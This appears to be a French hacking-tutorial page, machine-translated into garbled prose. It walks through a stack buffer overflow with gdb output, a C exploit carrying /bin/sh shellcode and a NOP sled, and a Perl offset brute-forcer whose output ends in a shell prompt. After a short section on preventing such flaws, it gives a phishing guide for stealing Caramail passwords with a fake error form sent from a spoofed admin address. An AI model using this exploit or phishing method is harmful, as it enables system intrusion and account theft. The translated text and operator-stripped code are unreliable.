maintenant au ` 0x41414141'(hexadécimal codez du ` A de lettre 'causant le
défaut de segmentation. Maintenant nous pouvons exécuter n'importe quelle
instruction souhaitée, un fait qu'elle est assez pour ajouter le shellcode dans
le programme qui lance le « vulnérable » et a laissé l'indicateur d'Istruction
se diriger à son
premier byte.
La conclusion hors de l'adresse absolue du shellcode n'est pas aussi facile,
c'est pourquoi simplifier pour n'importe quoi on préfèrent mettre le shellcode
au milieu de l'amortisseur et compléter partout de NOPs. Nous frapperons
probablement un du NOPs dans la chaîne, auquel nous joindrons le shellcode.
Voici l'exploit pour le programme vulnérable.
L'adresse de retour relative (retour) a été obtenue comme suit :
Commencer le programme : Perl vulnérable de ` - printf "a" x 260'` de
e '
Le programme a reçu le signal SIGSEGV, défaut de segmentation.
0x61616161 in ?? () (gdb) info reg esp esp 0xbfffdb40
0xbfffdb40 (gdb)
L'adresse de retour absolue sera à côté de notre retour, il sera
assez d'utilisation d'un certain bruteforce pour découvrir le bon
excentrage.
//EXPLOIT.C #include
#define NOP 0x90 // NOP
OPCODE #define LEN 128 // Buffer Size #define RET 0xbfffdb40 // return
Address
static char
shellcode[]= "xebx17x5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0bx89xf3x8d" "x4ex08x31xd2xcdx80xe8xe4xffxffxffx2fx62x69x6ex2fx73x68x58";
main(int
argc, char *argv[]) { char buffer[LEN]; long retaddr = RET
atoi(argv[1]); int i; printf("Shellcode size : %d ",
strlen(shellcode)); fprintf(stderr,"Using address 0x%lx ",retaddr);
//
Build the overflow string. for (i = 0; i < LEN; i = 4) *(long *)
&buffer[i] = retaddr;
// copy NOP for (i=0;
i<(LEN-strlen(shellcode)-10);i ) *(buffer i) = NOP;
// Copy the
shellcode into the buffer. memcpy(buffer
i,shellcode,strlen(shellcode));
// Execute the
program execlp(“vulnerable", "vulnerable", buffer,
NULL); }
//BRUTE.PL #!/usr/bin/perl $MIN=0; $MAX=5000;
while($MIN<$MAX) { printf("
offset : $MIN "); system("./exploit $MIN"); $MIN ; }
Conclusions
$./brute.pl ……. Shellcode size : 38 Using
address 0xbfffdbc5 offset : 134 Shellcode size : 38 Using address
0xbfffdbc6 offset : 135 Shellcode size : 38 Using address
0xbfffdbc7 sh-2.05b$
Nous pourrions exécuter le shellcode exploitant le débordement de PILE.
L'existence d'un programme vulnérable représente une menace sérieuse pour la
sécurité de nos systèmes. Un attaquant pourrait exécuter le code arbitraire avec
des permissions élevées si possible. En fait n'existe aucune manière d'être sûre
en raison de la nature des attaques, infact qu'elles sont basées sur des erreurs
de programmation, pour cette raison il est très important de maintenir le
logiciel constamment amélioré.
Les attaques de type
buffer overflow
Un buffer overflow est une attaque visant à
expoiter une faille dans une application (navigateur web etc...) pour exécuter
un code arbitraire. En pratique, une attaque de type buffer overflow fait crasher le programme en écrivant dans
un buffer plus de donné qu'il ne peut en contenir ( un buffer est une zone de
mémoire temporaire utilisée par une application) dans le but d'éffacer une
partie du code de l'application et d'y injecter le code pour exploiter le
plantage de l'application.
Cette technique requière cependant un excellent niveau en programmation pour
être exploité. Son principal intérêt est qu'il ne nécessite pas dans la plupart
des cas un accés au système . Elle est donc redoutablement efficace !
Comment éviter ce type de faille?
-On peut par exemple utiliser un language qui n'autorise pas ce type de
faille (Java...) -Utiliser des logiciels spécialisé dans la vérification du
code source -Avoir des produits mise à jours -Utiliser des logiciels bien
codé
Formulaire piégé
caramail
Caramail Hacker une boîte caramail * Formulaire piégé ! Le formulaire,
c'est une technique très connue qui est surtout applicable quand l'inocente
victime n'est pas trop inteligente ... (disons qu'on va jouer avec le côté con
du pigeon !) On va tout simplement lui envoyer un formulaire semblable à un
formulaire d'erreur de son fournisseur lui demandant de mettre son mot de passe
car un problème est survenue ! Il faut remplacer "votre e-mail@fournisseur.com"
par votre mail. Il faut envoyer le tout en html. Vous pouvez envoyer ce
formulaire er vous créant une boite sur caramail. Pour que ce soit plus
crédible, prenez une adresse de type admin@caramail.com.
Vous pouvez aussi utilisez Ghostmail pour envoyez les formulaires. En effet,
c'est un logiciel de mail anonyme qui permet aussi d'envoyer des formulaires
puisqu'il a une option "envoyer en html". Il est plutot facile a utiliser.
D'abord vous le télécharger dans la rubrique download et vous l'ouvrez. Vous
faites copier-coller le code dans le champ message et vous remplissez les
données demandez (expéditeur, destinataire...). Il y a plusieurs onglets pour
les options. Naviguez dans les onglets et cochez la case "envoyer en html" (ou
kekchose de ce genre). Il va falloir entrez un serveur par exemple smtp.free.fr,
smtp.laposte.net... Avant d'envoyer le formulaire, vérifiez bien que vous avez
mis votre e-mail à la place de "votreemail@fournisseur.com. Cliquez sur envoyez
et c'est terminé!!!
voilà le code du formulaire:
|